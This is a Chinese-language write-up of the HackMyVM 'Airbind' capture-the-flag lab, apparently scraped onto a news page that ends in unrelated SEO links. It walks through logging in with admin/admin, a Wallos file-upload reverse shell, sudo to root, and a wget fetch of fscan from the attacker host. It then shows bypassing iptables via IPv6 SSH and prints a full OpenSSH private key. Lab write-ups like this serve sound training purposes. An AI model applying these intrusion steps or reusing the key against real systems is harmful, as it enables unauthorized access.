当前位置: 首页 > news >正文

html5微网站demo视频专用客户端app

html5微网站demo,视频专用客户端app,网站关键词从哪改,网站的在线qq客服链接怎么做的目录 一、测试环境 1、系统环境 2、使用工具/软件 二、测试目的 三、操作过程 1、信息搜集 2、Getshell 3、提权 使用ipv6绕过iptables 四、结论 一、测试环境 1、系统环境 渗透机:kali2021.1(192.168.101.127) 靶 机:debian(192.168.101.11…

目录

一、测试环境

1、系统环境

2、使用工具/软件

二、测试目的

三、操作过程

1、信息搜集

2、Getshell

3、提权

使用ipv6绕过iptables

四、结论


一、测试环境

1、系统环境

渗透机:kali2021.1(192.168.101.127)

靶  机:debian(192.168.101.112)

物理机:win11(192.168.101.241)

注意事项:

①该类型靶场只能在virtualBox上搭建,因此将靶机设置为桥接网络,方便进行渗透。攻击机kali也要桥接出来,不然会出问题。

②靶机启动失败:设置中取消勾选usb即可

2、使用工具/软件

Kali: arp-scan(主机探测)、nmap(端口和服务探测)、gobuster(目录扫描)、nc(获取shell,测试端口)、ping6(探测ipv6地址)、ssh(进行远程连接)

物理机:burp suite(修改请求包)

测试网址:http://192.168.101.112

靶场介绍:由国外大佬搭建的靶场,类似于vulnhub,经常更新,需要翻墙才能进。

地址:https://hackmyvm.eu/machines/machine.php?vm=Airbind

二、测试目的

通过wallos的文件上传漏洞获取反弹shell,通过ipv6地址进行ssh连接绕过iptables。

三、操作过程

1、信息搜集

主机探测

arp-scan -l

靶机IP:192.168.101.112

物理机IP:192.168.101.241

端口和服务探测

nmap -sT -A -p- -T4 192.168.101.112

靶机开启了22端口(ssh服务)、80端口(web服务)

但是需要注意的细节是这里的22端口是filtered状态

目录扫描

gobuster dir -u http://192.168.101.112 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,jsp,html,txt

2、Getshell

靶场主页是登录页面,测试弱口令成功登录

admin/admin

通过查找该webapps的漏洞,发现wallos存在文件上传的RCE漏洞

文件上传点在主页的Add first subscription

这里要谨慎操作,上传成功一次之后就上传不了文件了,可以提前留个快照再操作

在upload logo点上传文件,直接上传反弹shell文件,save保存,用burp抓save的包

根据漏洞exp

修改两个点:content-type和文件头

修改后放包,可以看到成功上传

上传的文件可以在/images/uploads/logos/中找到

http://192.168.101.112/images/uploads/logos/

攻击端开启监听,点击反弹shell文件即可获取shell

3、提权

查看sudo权限发现www-data用户有完整的sudo权限,那么可以直接拿下root用户了

sudo -l
sudo su root
id

进root的家目录拿flag:4408f370877687429c6ab332e6f560d0

SHELL=/bin/bash script -q /dev/null
cd
ls
cat user.txt

但是只是user.txt,很奇怪?

再看一下IP

ip a

可以看到,这个IP:10.0.3.241并不是web网页的地址

那么web主机的IP呢?

既然这是内网的一个IP,那就用fscan扫描一下该网段

wget 192.168.101.127:8888/fscan
chmod +x fscan

./fscan -h 10.0.3.241/24

可以看到,果然有另一个内网地址10.0.3.1,作为网关

可以ping到10.0.3.1

联想到开局扫描端口时22端口的filtered情况,尝试用nc探测22端口情况

正常探测22端口开放,会有回显,如下:

nc 127.0.0.1 22

在靶机探测,明显22端口探测被拦截,没有任何回显

nc 10.0.3.1 22

使用ipv6绕过iptables上线第二个系统

可以用ipv6广播来获取所有的ipv6地址,ff02::1是广播地址,向所有主机发送报文

ping6 -I eth0 ff02::1

这里获取了三个ipv6地址:

fe80::20c:29ff:fe1f:da51%eth0

fe80::a00:27ff:fedc:2a3b%eth0

fe80::cc02:bfff:fee5:f81c%eth0

尝试ssh连接ipv6地址,私钥可以在靶机的root根目录获取

cd .ssh
ls
cat id_rsa

私钥如下:

-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEAzhi8CwvvtsKmKafXglHqWyCTjiy4wSfUkwGlQkJ+flYthTVBAJ/L
GxPkEjSi5G6eBYyME9Pm8xBbacS1Jbr18IYIPYy0fu9j7MXRTpvYTITHIrk3g2oLs+2f+I
hZqm1cVr4MgTjxl62/hcZoIZoALz02uFzmdiOc19mrrD+cVoop0gpG5VMI6pCwF3fiK17q
Wbyjt62i7VsrhQ8kMWaT7HXBK30k06EyBlUK4sRLarr/rMCqSCqJ/TwJP3cs4d+5LssLxY
RIxJMh6B94mT7K3MA034e4PpUz8frw1eT7FyUd8XGsipWuKAmwPVymNGEQFvKaGJ6IMLF6
b5KFReygmfYkGBLNjhP1waDU7NxqVriKN59DGebMfvW8rIll/sIPqyEJOTr+7EF74Dv03q
neH2hMrgu7Duonn7sM9DUgAu9CRXai3cxPFQMokmEZbblfwwJWaw94w4cqzVsenX5GQxFb
AUfSYDdrY+qmO8+xr9FP14DbfPbvn+Cof0G4sL99AAAFgCRJ8E8kSfBPAAAAB3NzaC1yc2
EAAAGBAM4YvAsL77bCpimn14JR6lsgk44suMEn1JMBpUJCfn5WLYU1QQCfyxsT5BI0ouRu
ngWMjBPT5vMQW2nEtSW69fCGCD2MtH7vY+zF0U6b2EyExyK5N4NqC7Ptn/iIWaptXFa+DI
E48Zetv4XGaCGaAC89Nrhc5nYjnNfZq6w/nFaKKdIKRuVTCOqQsBd34ite6lm8o7etou1b
K4UPJDFmk+x1wSt9JNOhMgZVCuLES2q6/6zAqkgqif08CT93LOHfuS7LC8WESMSTIegfeJ
k+ytzANN+HuD6VM/H68NXk+xclHfFxrIqVrigJsD1cpjRhEBbymhieiDCxem+ShUXsoJn2
JBgSzY4T9cGg1Ozcala4ijefQxnmzH71vKyJZf7CD6shCTk6/uxBe+A79N6p3h9oTK4Luw
7qJ5+7DPQ1IALvQkV2ot3MTxUDKJJhGW25X8MCVmsPeMOHKs1bHp1+RkMRWwFH0mA3a2Pq
pjvPsa/RT9eA23z275/gqH9BuLC/fQAAAAMBAAEAAAGAAezkutSwd1xfqYV2I7NItXO7NS
mRS0qoN3xdMx6EaIE9GSC7e/pCLz1TFOF1gR1QcBxVRa0l2/Dz7avHBnR17jqOUqbhG8t4
O0LI1wtpLKPT6WziCiIAPHzUkQGTFt7BLVVGsCFcTm6y2pjVKbUy2b4gZ/4EMCfahAC2VB
xfBUbyp5HtgiBxtaFG5904mW+gUFjNDb77RezjXfGbhLOg36Vk+ddINAruOPVr7dzoGHXp
RA+jt5tgISPBsVxXaL/Kiotyu/mBkLU5BRe2X9cfrxfq48mfes+2QiQHzZEpd6AL5ESHO1
zDFCSYM4HJUCSlvGYHd9Xi7EbFcQVg60d/AI7D7q9KoVPYHf5K2gkzUAgR5LtRl9lQ+riX
wOXviBEaC8iOF8VHB77EHdiUZHXtOovUdHqGlM98vwa8KgbUjYVaHtjYGvL0wb6Lp5jeKe
bXcy+7W6F1IjxNKk7CSaXY00asfHpLRVwbURz/505CqgQjBoSKKnnX/wRZt5y35NzZAAAA
wBbeKgaf45unZCyCXerjo4wON+ntDz1AbvUMeLDsJclnwtFdtedmrWnJZNkCVLMlX3b4q/
sQnz0xCD0UxkEkwaEqKrOXVPaqgSU+UdIj0e/GObNiAfqoO4l04/iqxs5ozh5+dzgCt7Fw
porszJ48DU9dJ5mvgeNirRpDMJOIhf/NZaA3YDGC4TziOl7bxMNPYuLqYED/syjHYNVxvT
eEqNF5P4NsawKmu6ExKzgsPTRZ4PcT/iQFsmsBozKbqUVZxwAAAMEA8fKsYXT/AwoqExHZ
YXcMQtAuM92isebSPv63Ssy9N+PaPsdKC6nl3CqENy3zBSE0Yo1LvclfS7gwACtedVWS2Q
GqB6z/q5gc2l6/VG1s8WcG3cbUlKPzQDTsSMZ7CMYK0lMX1jvzXjwqdJ1pSxFZfMdHuJpy
/mxUrpsgwhbzP589qc/UD/FfKjPyVTm7qs8qNeJDNsjcIl0Wp59OvufRh+cAimGX1S68Er
3H+DeE+Ymbi8e1rFN7C+HE1p6fqy3ZAAAAwQDaEQRgF2zKFz791AnRpx7I700k6q2RM1FZ
YnsmIYfdk6EEwczZ3ed8nbH+CLmx7npdoKG5SUqx4XiELPO8qOpmNqZoHH/1T3GxdjTRYc
cL40NAQDN+gR4DCPO5tmc/uojQm9Guhd7o8dQKAitjy6jrW+xDvtHNWl0gzKKZm3ndlwp7
re+b97O6LhCm7mQ79hVX8mAyk2/p129bzwGPtsSK3zB7zLksEKj0AlEEfiifyMjS9gNq0e
EkGwPez9XGBEUAAAALcm9vdEB1YnVudHU=
-----END OPENSSH PRIVATE KEY-----

将私钥保存在攻击机kali上

vim id_rsa
cat id_rsa
chmod 600 id_rsa

ssh分别连接三个ipv6地址

fe80::a00:27ff:fedc:2a3b%eth0

ssh root@fe80::a00:27ff:fedc:2a3b%eth0 -i id_rsa

连接第二个地址成功连接,是root@airbind,一个新的用户。

查看IP可以看到,该系统是web网页的主机,也是10.0.3.1主机

在根目录找到第二个flag:2bd693135712f88726c22770278a2dcf

四、结论

一台主机也可以有两套系统同时运行,当iptables过滤ipv4地址的访问时,可以用ipv6地址绕过限制,进行连接。

http://www.rdtb.cn/news/14593.html

相关文章:

  • 湖南做网站 e磐石网络bt磁力搜索引擎
  • 客户管理系统 wordpress贵州seo培训
  • 广西网站建设智能优化上海推广系统
  • 那个网站专做地质基础信息百度收录要多久
  • 中国建设部网官方网站宁波网络推广外包
  • java做网站涉及的技术抖音seo排名优化软件
  • 微信网页版官网二维码搜索引擎优化的实验结果分析
  • 什么网站可以免费做试卷湖南seo推广多少钱
  • 佛山网吧什么时候恢复营业温州seo教程
  • 网站后台打不开的原因网页制作模板的网站
  • 网站视频弹窗代码互联网产品营销策划方案
  • 上海网站建设怎么样seo品牌
  • 网站砍价活动怎么做优化营商环境建议
  • 做酒网站怎么做手工
  • 网站ftp文件seo经理
  • 政务信息网站建设工作武汉seo外包平台
  • 做网站测试 怎么兼容ie9百度 营销中心
  • 做网站设计工资多少钱关键词查询爱站网
  • 网站设计网址海外推广运营
  • 长沙哪个公司做网站保定seo推广外包
  • 企业网站制作优化宁波网站推广公司价格
  • 宁波企业网站排名方法搜索排名优化软件
  • 公众号运营策划方案模板seo优化评论
  • 企业网站优化多少钱uc搜索引擎入口
  • 做营销型网站服务网站百度收录批量查询
  • 一个外国人做的破解游戏网站seo推广系统排名榜
  • 西安SEO网站建设优化落实疫情防控
  • 成都网站建设cdxwcx软件开发外包
  • 电商网站如何提高转化率怎么创建网站免费建立个人网站
  • 浙江瑞通建设集团网站买卖链接网